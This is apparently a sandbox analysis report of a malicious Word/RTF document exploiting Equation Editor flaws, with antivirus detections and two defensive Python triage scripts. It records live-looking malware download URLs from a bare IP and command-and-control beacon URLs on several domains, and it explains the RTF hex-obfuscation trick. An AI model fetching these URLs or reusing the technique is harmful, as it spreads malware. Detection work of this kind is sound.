Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 11, 2023, 3:42 p.m. | Oct. 11, 2023, 3:46 p.m. |
Process | Command line | PID |
---|---|---|
WINWORD.EXE | "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\OI0ioioOI0I0I0oioioi0oiOI0oi0000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300i0iOI0OI0Ioi0IO0i00I0I0I000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000.doc | 912 |
IP Address | Status | Action |
---|---|---|
103.71.154.243 | Active | Moloch |
104.21.13.143 | Active | Moloch |
164.124.101.2 | Active | Moloch |
199.59.243.225 | Active | Moloch |
216.239.38.21 | Active | Moloch |
216.240.130.67 | Active | Moloch |
23.104.137.185 | Active | Moloch |
23.95.106.3 | Active | Moloch |
45.33.6.223 | Active | Moloch |
67.223.117.37 | Active | Moloch |
85.128.134.237 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
Signature | Suspicious features | Request |
---|---|---|
suspicious_features | Connection to IP address | GET http://23.95.106.3/350/sihost.exe |
suspicious_features | GET method with no useragent header, Connection to IP address | GET http://23.95.106.3/350/122/Ekcflzifpij.mp3 |
suspicious_features | GET method with no useragent header, Connection to IP address | GET http://23.95.106.3/350/122/process.exe |
suspicious_features | GET method with no useragent header | GET http://www.prosourcegraniteinc.com/kniu/?-3E-P=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.theartboxslidell.com/kniu/?-3E-P=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.xxkxcfkujyeft.xyz/kniu/?-3E-P=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.onlyleona.com/kniu/?-3E-P=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.tsygy.com/kniu/?-3E-P=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.poultry-symposium.com/kniu/?-3E-P=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&buPns=-YhUz8pH8JO |
suspicious_features | GET method with no useragent header | GET http://www.frefire.top/kniu/?-3E-P=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&buPns=-YhUz8pH8JO |
request | GET http://23.95.106.3/350/sihost.exe |
request | GET http://23.95.106.3/350/122/Ekcflzifpij.mp3 |
request | GET http://23.95.106.3/350/122/process.exe |
request | POST http://www.prosourcegraniteinc.com/kniu/ |
request | GET http://www.prosourcegraniteinc.com/kniu/?-3E-P=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&buPns=-YhUz8pH8JO |
request | GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip |
request | POST http://www.theartboxslidell.com/kniu/ |
request | GET http://www.theartboxslidell.com/kniu/?-3E-P=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&buPns=-YhUz8pH8JO |
request | POST http://www.xxkxcfkujyeft.xyz/kniu/ |
request | GET http://www.xxkxcfkujyeft.xyz/kniu/?-3E-P=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&buPns=-YhUz8pH8JO |
request | POST http://www.onlyleona.com/kniu/ |
request | GET http://www.onlyleona.com/kniu/?-3E-P=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&buPns=-YhUz8pH8JO |
request | POST http://www.tsygy.com/kniu/ |
request | GET http://www.tsygy.com/kniu/?-3E-P=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&buPns=-YhUz8pH8JO |
request | POST http://www.poultry-symposium.com/kniu/ |
request | GET http://www.poultry-symposium.com/kniu/?-3E-P=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&buPns=-YhUz8pH8JO |
request | POST http://www.frefire.top/kniu/ |
request | GET http://www.frefire.top/kniu/?-3E-P=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&buPns=-YhUz8pH8JO |
request | POST http://www.prosourcegraniteinc.com/kniu/ |
request | POST http://www.theartboxslidell.com/kniu/ |
request | POST http://www.xxkxcfkujyeft.xyz/kniu/ |
request | POST http://www.onlyleona.com/kniu/ |
request | POST http://www.tsygy.com/kniu/ |
request | POST http://www.poultry-symposium.com/kniu/ |
request | POST http://www.frefire.top/kniu/ |
file | C:\Users\test22\AppData\Local\Temp\~$0ioioOI0I0I0oioioi0oiOI0oi0000##############00i0iOI0OI0Ioi0IO0i00I0I0I000##############000.doc |
host | 23.95.106.3 |
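The request list above shows three patterns worth turning into detection logic: executables fetched from a bare IP (23.95.106.3), GET requests sent with no User-Agent header, and the same URI path (/kniu/) hit with a POST/GET pair on seven different domains using identical query-parameter names. The Python script below is an added example, not part of the sandbox report or its tooling. It runs those checks over a constructed sample built from the report's own request list (query values shortened, and the User-Agent flag taken from the report's "no useragent header" feature text rather than from a packet capture) and collects the hosts it flags into an IOC list. The finding names and the three-host threshold are the example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: (method, url, user_agent_present) tuples taken from the
# report's request list. Query values are shortened, and the third field is an
# assumption read off the "GET method with no useragent header" feature text.
SAMPLE_REQUESTS = [
    ("GET",  "http://23.95.106.3/350/sihost.exe", True),
    ("GET",  "http://23.95.106.3/350/122/Ekcflzifpij.mp3", False),
    ("GET",  "http://23.95.106.3/350/122/process.exe", False),
    ("POST", "http://www.prosourcegraniteinc.com/kniu/", True),
    ("GET",  "http://www.prosourcegraniteinc.com/kniu/?-3E-P=9xFgCh3s8l&buPns=-YhUz8pH8JO", False),
    ("GET",  "http://www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip", True),
    ("POST", "http://www.theartboxslidell.com/kniu/", True),
    ("GET",  "http://www.theartboxslidell.com/kniu/?-3E-P=pbzwZ3uv6ZLN&buPns=-YhUz8pH8JO", False),
    ("POST", "http://www.xxkxcfkujyeft.xyz/kniu/", True),
    ("GET",  "http://www.xxkxcfkujyeft.xyz/kniu/?-3E-P=i0HwDxosD6vP&buPns=-YhUz8pH8JO", False),
    ("POST", "http://www.onlyleona.com/kniu/", True),
    ("GET",  "http://www.onlyleona.com/kniu/?-3E-P=eul8o7FRTpzZ&buPns=-YhUz8pH8JO", False),
]

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PAYLOAD_EXT = (".exe", ".dll", ".scr")   # example's own list of "payload-like" suffixes


def is_bare_ip(host):
    """True when the Host is a literal IPv4 address rather than a name."""
    return IPV4.match(host or "") is not None


def triage(requests, min_hosts=3):
    """Apply three checks to (method, url, has_user_agent) tuples.

    1. requests to a bare IP, with a stronger finding when the path looks like a PE download
    2. GET requests that carry no User-Agent header
    3. one URI path reused across >= min_hosts distinct domains (candidate rotating C2)
    Returns findings, the rotating paths, their query-parameter names and a host IOC list.
    """
    findings = []
    hosts_by_path = defaultdict(set)
    params_by_path = defaultdict(set)
    for method, url, has_ua in requests:
        u = urlsplit(url)
        host, path = u.hostname, u.path
        if is_bare_ip(host):
            kind = "payload_from_bare_ip" if path.lower().endswith(PAYLOAD_EXT) else "bare_ip_request"
            findings.append((kind, host, url))
        if method == "GET" and not has_ua:
            findings.append(("get_without_user_agent", host, url))
        hosts_by_path[path].add(host)
        params_by_path[path].update(parse_qs(u.query).keys())

    rotating = {p: sorted(h) for p, h in hosts_by_path.items() if len(h) >= min_hosts}
    iocs = {f[1] for f in findings}
    for hosts in rotating.values():
        iocs.update(hosts)
    return {
        "findings": findings,
        "rotating_paths": rotating,
        "param_keys": {p: sorted(params_by_path[p]) for p in rotating},
        "iocs": sorted(iocs),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_REQUESTS)
    for kind, host, url in result["findings"]:
        print(f"{kind:24} {host:28} {url}")
    print("rotating paths:", result["rotating_paths"])
    print("shared query keys:", result["param_keys"])
    print("host IOCs:", result["iocs"])
```

Note that the sqlite.org download is not flagged by any of the three rules: it is a named host, has a User-Agent and is not part of the rotating set. That is the intended behaviour of these checks, but a retrieval of a SQLite DLL by a Word process is still worth a manual look when reviewing the full report.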
Engine | Detection |
---|---|
Lionic | Trojan.MSOffice.CVE-2018-0802.4!c |
DrWeb | Exploit.CVE-2018-0798.4 |
CAT-QuickHeal | Exp.RTF.Obfus.Gen |
Skyhigh | BehavesLike.BadFile.mx |
McAfee | RTFObfustream.c!2A932891E369 |
Sangfor | Malware.Generic-RTF.Save.4aa2c45b |
Arcabit | Exploit.RTF-ObfsObjDat.Gen |
Symantec | Exp.CVE-2017-11882!g6 |
ESET-NOD32 | multiple detections |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Exploit.MSOffice.CVE-2018-0802.gen |
BitDefender | Exploit.RTF-ObfsObjDat.Gen |
NANO-Antivirus | Exploit.Rtf.Heuristic-rtf.dinbqn |
MicroWorld-eScan | Exploit.RTF-ObfsObjDat.Gen |
Tencent | Office.Exploit.Cve-2018-0802.Anhl |
Emsisoft | Exploit.RTF-ObfsObjDat.Gen (B) |
F-Secure | Heuristic.HEUR/Rtf.Malformed |
VIPRE | Exploit.RTF-ObfsObjDat.Gen |
TrendMicro | Trojan.W97M.CVE201711882.SMN |
FireEye | Exploit.RTF-ObfsObjDat.Gen |
Ikarus | Exploit.RTF.Doc |
Detected | |
Avira | HEUR/Rtf.Malformed |
Microsoft | Exploit:Win32/CVE-2017-11882!ml |
ZoneAlarm | HEUR:Exploit.MSOffice.CVE-2018-0802.gen |
GData | Exploit.RTF-ObfsObjDat.Gen |
Varist | RTF/ABRisk.RVKH-2 |
AhnLab-V3 | RTF/Malform-A.Gen |
ALYac | Exploit.RTF-ObfsObjDat.Gen |
Zoner | Probably Heur.RTFBadHeader |
Rising | Exploit.CVE-2017-11882!1.E8F8 (CLASSIC) |
MAX | malware (ai score=84) |
Fortinet | MSOffice/CVE_2018_0798.BOR!exploit |
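Most of the engines above classify the file as an obfuscated RTF carrying an Equation Editor exploit (CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798), and the "RTF-ObfsObjDat" family name describes the technique: the hex stream inside the \objdata group is broken up with interleaved control words so that naive hex extraction fails, while Word's RTF reader simply ignores the extra tokens. The script below is an added example and is not derived from the sample in this report. It decodes an \objdata group the way a tolerant reader does, parses the OLE1 object header to recover the class name, looks for the Equation.3 CLSID ({0002CE02-0000-0000-C000-000000000046}) in the embedded data, counts the interleaved control words as an obfuscation signal, and notes \objupdate, which forces the object to be loaded when the document is opened. The RTF it runs on is constructed for the example (a hand-built object header with no shellcode), and the indicator names are the example's own.

```python
import re

# Equation.3 class identifier {0002CE02-0000-0000-C000-000000000046} as it is stored
# in an OLE stream: the first three GUID fields little-endian, the last eight bytes as-is.
EQUATION3_CLSID = bytes.fromhex("02ce020000000000c000000000000046")

# Constructed sample (not the report's document): an embedded object whose \objclass is
# absent and whose \objdata hex is split by three control words. The hex is an OLE1
# ObjectHeader (version, format id 2 = embedded, class name "Equation.3", empty topic and
# item names, 16 bytes of "native data" holding only the CLSID). It is not an exploit.
SAMPLE_RTF = (
    "{\\rtf1\\ansi\\deff0\n"
    "{\\object\\objemb\\objupdate{\\*\\objdata 0105000002000000\\objw1 0b000000\n"
    "4571756174696f6e2e3300\\objh2 00000000000000001000000002ce0200\n"
    "00000000\\objsetsize3 c000000000000046}}\n"
    "\\par }"
)

OBJDATA = re.compile(r"\\\*\\objdata\b")
CONTROL_WORD = re.compile(r"\\[A-Za-z]+-?\d*\s?")   # \name, optional numeric arg, one delimiter


def _group_body(text, start):
    """Text from start up to the '}' that closes the group already open at start."""
    depth = 0
    for i in range(start, len(text)):
        c = text[i]
        if text[i - 1] == "\\":          # \{ and \} are literal characters, not group delimiters
            continue
        if c == "{":
            depth += 1
        elif c == "}":
            if depth == 0:
                return text[start:i]
            depth -= 1
    return text[start:]


def extract_objdata(rtf):
    """Return (blob, interleaved_control_words) for every \\*\\objdata group.

    Control words, nested braces and whitespace inside the group are dropped, as an RTF
    reader does; whatever remains is read as hex. \\bin binary runs are not handled.
    """
    blobs = []
    for m in OBJDATA.finditer(rtf):
        body = _group_body(rtf, m.end())
        stripped, n_ctrl = CONTROL_WORD.subn("", body)
        stripped = re.sub(r"[{}\s]", "", stripped)
        hexchars = re.sub(r"[^0-9A-Fa-f]", "", stripped)
        junk = n_ctrl + (len(stripped) - len(hexchars))
        if len(hexchars) % 2:
            hexchars = hexchars[:-1]
        blobs.append((bytes.fromhex(hexchars), junk))
    return blobs


def parse_ole1_header(blob):
    """Parse the OLE1 ObjectHeader at the start of an \\objdata blob (MS-OLEDS 2.2.4)."""
    if len(blob) < 12:
        return None
    version = int.from_bytes(blob[0:4], "little")
    format_id = int.from_bytes(blob[4:8], "little")
    name_len = int.from_bytes(blob[8:12], "little")
    class_name = blob[12:12 + name_len].rstrip(b"\x00").decode("latin-1", "replace")
    return {"version": version, "format_id": format_id, "class_name": class_name}


def triage_rtf(rtf):
    """One indicator record per embedded object found in the RTF text."""
    objupdate = "\\objupdate" in rtf
    results = []
    for blob, junk in extract_objdata(rtf):
        hdr = parse_ole1_header(blob) or {}
        name = hdr.get("class_name", "")
        rec = {
            "blob_len": len(blob),
            "class_name": name,
            "format_id": hdr.get("format_id"),
            "equation_class_name": name.lower().startswith("equation"),
            "equation3_clsid": EQUATION3_CLSID in blob,
            "objupdate": objupdate,
            "interleaved_control_words": junk,
        }
        rec["suspicious"] = rec["equation_class_name"] or rec["equation3_clsid"]
        results.append(rec)
    return results


if __name__ == "__main__":
    for rec in triage_rtf(SAMPLE_RTF):
        print(rec)
```

Either Equation signal on its own is enough to pull a document for deeper analysis: a legitimate Equation.3 object is rare in modern documents, and a class name that has been blanked while the CLSID still appears in the data is exactly what the obfuscated samples look like. A high interleaved-control-word count with no recognisable class at all is also worth a look, since it means the hex stream was deliberately fragmented.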